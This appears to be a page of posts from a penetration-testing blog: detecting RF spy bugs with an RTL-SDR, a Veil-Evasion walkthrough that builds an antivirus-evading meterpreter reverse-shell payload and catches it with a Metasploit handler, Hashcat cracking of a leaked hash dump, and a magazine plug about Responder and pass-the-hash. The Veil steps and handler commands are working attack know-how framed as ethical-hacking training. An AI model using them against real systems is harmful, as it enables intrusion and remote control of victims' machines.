Finding Spy Bugs with an RTL-SDR & Salamandra

With the explosion of Internet of Things (IoT) devices, and some hardware now being banned from certain facilities due to spying concerns, it would be nice if there was an easy way to scan your office to see if there are any hidden microphone “spy” devices.

Salamandra is a tool to detect and locate spy microphone devices in closed environments. Usually the “Spy” microphones you can find online will record audio and then re-broadcast it at a certain frequency. Salamandra displays any detected microphone type devices along with its broadcasting frequency. Using a displayed signal strength, it is possible to find the general location of the device.

In this article we will use Kali Linux, an RTL-SDR (I used a NooElec Nesdr Smart with the included extendible antennae), and Salamandra.

Installing RTL-SDR software

On the Kali system, connect your RTL-SDR card. Open a Terminal window and install rtl-sdr:

  • apt install rtl-sdr

Spy_Microphone_SDR1

  • Run “rtl_test” to make sure Kali correctly sees the card.

You should see an output as below:

Spy_Microphone_SDR2

  • Press “Ctrl-c” to stop test.

Installing Salamandra

Tool authors: Sebastian Garcia, Veronic Valeros
Tool Website: https://github.com/eldraco/Salamandra

Download Salamandra with git clone:

Spy_Microphone_SDR3

Change to the Salamandra directory.

You will need to install “pygame” as it is required by Salamandra and is not installed by default in Kali:

  • pip install pygame

Spy_Microphone_SDR4

Now, just run Salamandra with the recommended options:

  • ./salamandra.py -t 0 -a 100 -b 200 -s -S

Spy_Microphone_SDR5

Salamandra will then automatically detect any RF bugs it can find. The display includes the frequency and the signal power. Power is displayed by “#” signs. The stronger the signal, the more “#” signs that will be shown:

Spy_Microphone_SDR6

  • Press “q” to quit.

Listening to a Detected Signal

Now that you have the frequency of the bug, you can listen to and/or record it using Gqrx.

To install Gqrx:

  • apt install gqrx

Spy_Microphone_SDR7

Now run the program:

Spy_Microphone_SDR8

On the “Configure I/O devices” screen, select your device. Mine was the Realtek RTL2838UHID device, as seen below:

Spy_Microphone_SDR9

You may want to drop your sampling rate if you have any issues.

When you click “OK”, you will then see the main Gqrx program interface. Just hit the “Play” icon in the upper left corner to turn it on, and then select your frequency by clicking on the large frequency numbers on the top of the screen:

Spy_Microphone_SDR10

Picking a live radio station (as shown above) is usually the best way to figure these programs out if you are not familiar with them.

Change your mode to the correct signal type. Usually it is one of the FM signals (WFM, NFM). Click in the middle of the graphical signal wave to put the red line in the middle of the highest peak. Then drag the sides to the right and left of the signal slopes, as seen above.

And that is it! If you have the correct settings you should have audio.

  • Now that you know it works using a radio station, tune in to the frequencies that were detected by Salamandra

You may need to play with the setting some to get a clean signal. Most likely there may be nothing there, it may be picking up your headset microphone or something else. But it is very good at picking up analog listening devices.

To Record Signal

In Gqrx, hit “Rec” at bottom right to record.

  • The file will record and save in the “Root” folder.

You can hit the Play button in Gqrx to listen to the file that you just recorded. You could also install a program like Audacity to listen to the saved file.

Conclusion

In this article we covered how to use an SDR-RTL device as a bug scanner. With Internet of Things type devices becoming more common place in the home and office, it isn’t a bad idea to scan to see if any of these may have a built-in microphone. For more information on the tool, see RTL-SDR’s article, which includes a link to a white paper written by the tool authors.

 

Advertisements

Anti-Virus Bypass with Veil on Kali Linux

One of the common hurdles of Ethical Hackers and Penetration Testers is bypassing anti-virus on target systems. Veil uses a Metasploit like interface to create a remote shell program that will bypass most Anti-Virus programs. A little social engineering is required to get the target to run the resultant shell program, but if they do, it will connect back to the Kali system and allow the attacker to have full remote access.

In this article we will discuss how to install and run Veil on Kali Linux. Since the previous version of this article there have been several changes to Veil. The first is that it is now much easier to install and run Veil on Kali Linux. Veil directly supports Kali 2018 and installs by only running two commands. Another change is that Veil includes new payloads written for additional languages.

Read more about the updates at https://www.veil-framework.com/.

INSTALLING VEIL

Tool GitHub Page: https://github.com/Veil-Framework/Veil

Installing Veil 3.x on Kali 2018 is very simple:

Veil Evasion Kali Linux

The install will then run for a while as the dependency packages are installed. Reboot when finished.

STARTING VEIL

Now let’s look at using Veil.

  • In a terminal window, enter, “veil

AV bypass 1

Veil offers two tools, Evasion and Ordinance. We want to run Veil-Evasion.

  • Enter, “use 1

AV bypass Veil 2

The Veil title menu bar should change to “Veil-Evasion”.

USING VEIL-EVASION

The first thing to do is to list the available payloads using the “list” command.

  • Type “list” and then press enter.

AV bypass 3

PowerShell attacks are very popular, so let’s use a PowerShell payload. Just enter the “use” command and the number of the payload that you want. In this tutorial we will use the “powershell/meterpreter/rev_tcp.py” payload.

  1. Type, “use 22” and hit “enter”.

This will select the payload and present us with the following screen:

bypassing AV 4

If you look at the options, you will notice that it looks (and acts) very similar to using Metasploit modules. For this module we will just need to set the LHOST variable to our Kali system IP address.

2. Type, “set LHOST 192.168.1.39” and then hit “enter”.

3. Now enter, “options” to view the value that we just set:

bypassing AV 5

We will leave the LPORT set to the default value of 4444. Now we just need to generate our shellcode.

4. Enter, “generate

Veil will now generate the shellcode with the options that we chose.

5. Now we need to give our created file a filename or base name, I chose “CutePuppy”.

Veil-Evasion now has all that it needs and creates our shellcode file. We should see something like the following output:

bypassing AV 6

This screen shows what payload was used and also where the output file is located. In this instance, the file was placed in the “/var/lib/veil/output/source/” directory. When it is run on a Windows system, it will try to connect out to our Kali machine. But before we do, we will need to start a Metasploit handler to accept the connection. The handler runs in Metasploit and waits until the shell file (CutePuppy.bat in this instance) is opened. Once it is executed, it creates a remote shell between your Windows system and the Kali box.

GETTING A REMOTE SHELL

To create the remote handler, we will be using Metasploit. You can use the RC file generated by Veil, but I prefer to do it manually.

  1. Start the Metasploit Framework from the Kali Quick Start menu.
  2. Now set up the multi/handler using the following settings:
  • use multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.1.39
  • set LPORT 4444
  • exploit

This starts the multi handler on the Kali System:

bypassing AV 7

Now we just need the target computer to run the file that Veil generated.

3. Copy “CutePuppy.bat” to your Windows Desktop:

bypassing AV 8

4. Now, double click on the .bat file to run it.

Nothing appears to happen, but on your Kali system, you should see this:

bypassing AV 9

A reverse shell session!

5. Now if we type “shell”, we see that we do in fact have a complete remote shell:

bypassing AV 10

The big question is, can this bypass anti-virus? At the time of this writing I ran the PowerShell based CutePuppy.bat file on a fully updated Windows 10 system running an updated Anti-Virus and it did detect it as malicious.

Anti-Virus engines have become much better at detecting PowerShell based threats. There are other options you can use in Veil. I will not cover this step by step, but using the “c/meterpreter/rev_tcp.py” payload provided different results.

Generating it into a test.exe file:

bypassing AV 12

We have a shell:

bypassing AV 13

CONCLUSION

Hopefully this article has shown that you cannot trust in your Anti-Virus alone to protect you from online threats. Unfortunately, sometimes your network security depends on your users and what they allow to run. Instruct your users to be very leery of internet links and never open any attachments that they receive in unsolicited e-mails. Blocking certain file types from entering or leaving your network is also a good idea.

Finally, use a Network Security Monitoring system (and logs) to help track down what happened and what was compromised if the worst does happen.

Cracking Passwords up to 256 Characters with Hashcat

Think your 12 character passwords are still strong enough? One of the top password cracking programs can now crack password up to 256 characters!

The 4.x release of Hashcat blows through the previous 32 character password cracking limit and can now crack up to 256 character passwords. It has been very helpful for working through Troy Hunt’s half a billion password hash release.

If you use the default or -w1 speed switch in Hashcat, it will now crack passwords up to 256 characters:

hashcat64 -D 2 –remove -m 100 massiveleak.txt rockyou.txt -o MassiveLeakCracked.txt -r rules/d3ad0ne.rule -w1 –gpu-temp-retain 75

hashcat long passwords1

If you use the -O switch, Hashcat will crack at a much faster rate, but will only be able to crack the traditional 32 and under length hashes:

hashcat long passwords2

As seen in the command below:

hashcat64 -D 2 –remove -m 100 massiveleak.txt rockyou.txt -o MassiveLeakCracked.txt -r rules/d3ad0ne.rule -O –gpu-temp-retain 75

Here are some of the large passwords (most likely unintentional junk) found in Troy Hunt’s 500 Million “Have I been Pwned” SHA1 password hash release:

24пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ

ðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅ

&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:

12345РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…

greens and water shine a place where a word friends speak to a thicket:

mihunol:||smtp.zdcd.pn||25||dfslgosa@wa!t.mccdonald@dtfafod307@xzwt.rg:toothyfe:||smtp.zdct.jrg||25||fhwjw307@fgrw.rd||dalecandrobotis@cab.rt:stanmattefel

* The last one could have possibly contained actual account information so the website name and possible account information has been altered, but the style, layout and length have remained the same.

All of the passwords above except for one were recovered from using wordlists and rules together, so similar passwords were already in the wordlist. One was recovered by just daisy chaining together multiple repetitive binary strings.

There are some other odd returns found in the cracked hashes, ones that looked something similar to these:

  • $HEX[ab32d4c1334455]d]9]
  • $HEX[abcbdb1212121212]4]f6d]

I have never seen Hashcat do that before, but when they were decoded from Hex to Ascii they looked about right.

There are also a lot of jumbled together lines that include partial e-mails & passwords together. Some even include what appear to be phone numbers and outdated credit cards (any personal information has already been publicly dumped, some of it for years). Obviously, these weren’t used as passwords, but is just some of the malformed data mentioned on Troy’s blog. Some of these lines are extremely long, so it is impressive that Hashcat is able to recover them.

I am still working through the list, I’m just using a single GTX960 card so it is taking a while, but during the process I found Not so Secure’s “OneRuletoRuleThemAll” Hashcat rule extremely useful.

Thanks to Troy Hunt for releasing the 500 million password dump. As a security trainer, it is a lot of fun and great practice to run through the dump using Hashcat. Also, thanks for his work on the “Have I Been Pwned” website. If you want to see if any of your accounts are included in the dump, just visit the Have I Been Pwned Website.

If you need to crack very long complex passwords, give Hashcat a try!

NetHunter Article Featured in Hakin9 Magazine

The latest Hakin9 Magazine is out! This issue is all about Android security and features my article on using Kali NetHunter and Responder together for getting quick user credentials.

Front Cover

In my article I explain how you could recover network credentials from a Windows network using the Android based Kali NetHunter and Responder (an LLMNR, NBT-NS & MDNS poisoner). I also show how you can “pass the hash” with credentials obtained and gain remote shell access to an unsecured or improperly secured Windows Server.

Other Articles in this Issue Include:

Mobile Penetration Testing Tutorial

by Olivia Orr

The objective of this tutorial is to learn the most common vulnerabilities in mobile applications using an app intentionally designed to be insecure. This tutorial will be based on the Windows platform, but you can use other systems if you wish.


Quick Android Review Kit (QARK) – A comrade for Android security analysis

by Vinayak Joshi and Venkatesh Sivakumar (Pranav Venkat)

QARK stands for Quick Android Review Kit. A quirky companion to get the hidden potential vulnerabilities of any Android applications. It is an open community tool designed to assist mobile application security pentesters to leverage its capabilities to reverse engineer mobile applications and conduct static analysis on the hidden vulnerabilities that can potentially create critical breaches. This article will explain how to use it.


Peeping Inside Android Applications: Reverse Engineering with Androguard

by Ajit Kumar

Reverse engineering is one of the ways to find out what’s inside of any Android applications; it also helps developers to learn, test and debug their and applications as well as applications written by others. Reverse engineering is a complex and cumbersome task, so tools like Androguard make this task automated and hence ease the job of reverse engineers. This tutorial provides a brief introduction of Androguard, explains various tools available inside Androguard and provides some examples of basic reverse engineering with Androguard.

And much more, check it out!